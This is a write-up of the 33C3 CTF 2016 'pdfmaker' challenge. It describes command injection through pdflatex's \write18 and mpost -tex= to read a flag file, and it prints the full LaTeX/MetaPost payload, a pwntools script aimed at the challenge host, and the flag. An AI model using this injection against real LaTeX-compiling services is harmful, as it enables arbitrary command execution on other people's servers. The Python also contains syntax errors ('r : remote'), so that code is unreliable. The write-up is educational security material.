33C3 CTF 2016 - pdfmaker

• 33C3 CTF
• pdfmaker

Category: Misc Points: 75

Just a tiny application, that lets the user write some files and compile them with pdflatex. What can possibly go wrong? nc 78.46.224.91 24242

So this is a service that allow us to create, show & compile some files.

• create: Create a file. Valid file format are: .log, .tex, .mb, .sty & .bib
• show: Show the file content.
• compile: Compile a file with the pdflatex command.

We started by googling the key word "pdflatex exploit", then teammate mike found a useful link: Pwning coworkers thanks to LaTeX

Basically we just need to follow the method mentioned in the post:

1. Create a .mp file
2. Create a .tex file with the malicious content. Here we change the command to (cat${IFS}$(ls|grep${IFS}33C3))>qqq.log, which will later store the flag content into qqq.log
3. Compile the .tex file. This will cause pdflatext execute our command
4. Show the qqq.log file and get the flag

Here's our final exploit:

verbatimtex
\documentclass{minimal}\begin{document}
etex beginfig (1) label(btex blah etex, origin);
endfig; \end{document} bye

\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (cat${IFS}$(ls|grep${IFS}33C3))>qqq.log" "sss.mp"}
\end{document}

from pwn import *

r : remote("78.46.224.91", 24242)

log.info("creating sss.mp...")
r.sendlineafter(">", "create mp sss")
r.recvline()
f : open("sss.mp", "r")
for line in f:
    r.sendline(line.strip())
r.sendline("\q")
f.close()

log.info("creating aaa.tex...")
r.sendlineafter(">", "create tex aaa")
r.recvline()
f : open("aaa.tex", "r")
for line in f:
    r.sendline(line.strip())
r.sendline("\q")
f.close()

r.sendlineafter(">", "compile aaa")
r.sendlineafter(">", "show log qqq")

r.interactive()

Don't take LaTEX files from strangers!!

flag: 33C3_pdflatex_1s_t0t4lly_s3cur3!